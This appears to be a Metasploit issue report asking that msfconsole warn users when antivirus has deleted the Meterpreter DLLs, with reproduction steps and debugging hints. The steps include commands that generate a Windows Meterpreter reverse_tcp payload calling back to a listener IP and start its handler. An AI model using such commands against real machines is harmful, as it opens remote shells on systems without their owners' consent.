When Antivirus deletes the Meterpreter DLLs, there's no clear indication that something has gone wrong.
We could improve this by:
Adding additional warning messages on msfconsole boot, potentially as part of the eicar check on bootup
Add additional logic to capture the scenario of generating a staged payload which isn't successfully opening a shell as the required Meterpreter DLLS are missing.
Generate payload:
use windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.159
generate -f exe -o shell.exe
Move the DLLS:
## Find where your DLLs are currently:
msf6 payload(windows/x64/meterpreter/reverse_tcp) > bundle show metasploit-payloads
[*] exec: bundle show metasploit-payloads
/Users/user/.rvm/gems/ruby-3.0.5@metasploit-framework/gems/metasploit-payloads-2.0.148
## Temporarily move them!
cd /opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/metasploit-payloads-2.0.148/data
sudo mv meterpreter/ removed_by_av_meterpreter/
Verifying nil path in msfconsole:
msf6 payload(windows/x64/meterpreter/reverse_tcp) > irb
[*] Starting IRB shell...
[*] You are in payload/windows/x64/meterpreter/reverse_tcp
>> MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: false)
=> nil
Now trigger the payload on the windows target
Currrent behavior
The prompt does not indicate any failure has occurred:
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
Expected behavior
Expected behavior:
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
[!] Meterpreter path metsrv.x86.dll not found. Ensure antivirus is not enabled, or reinstall Metasploit.
Motivation
Allow users to more clearly understand when their A/V is interrupting msfconsole usage
Debugging
Not sure where the code is being called from, but you should be able to put in a breakpoint and use puts caller or up and down inside an interactive pry breakpoint to work out what's what
msf6 payload(windows/x64/meterpreter/reverse_tcp) > irb
[*] Starting IRB shell...
[*] You are in payload/windows/x64/meterpreter/reverse_tcp
>> MetasploitPayloads.method(:meterpreter_path)
=> #<Method: MetasploitPayloads.meterpreter_path(name, binary_suffix, debug: ...) /Users/user/.rvm/gems/ruby-3.0.5@metasploit-framework/gems/metasploit-payloads-2.0.148/lib/metasploit-payloads.rb:40>
Summary
When Antivirus deletes the Meterpreter DLLs, there's no clear indication that something has gone wrong. We could improve this by:
Generate payload:
Move the DLLS:
Verifying nil path in msfconsole:
Now trigger the payload on the windows target
Currrent behavior
The prompt does not indicate any failure has occurred:
Expected behavior
Expected behavior:
Motivation
Allow users to more clearly understand when their A/V is interrupting msfconsole usage
Debugging
Not sure where the code is being called from, but you should be able to put in a breakpoint and use
puts caller
orup
anddown
inside an interactive pry breakpoint to work out what's what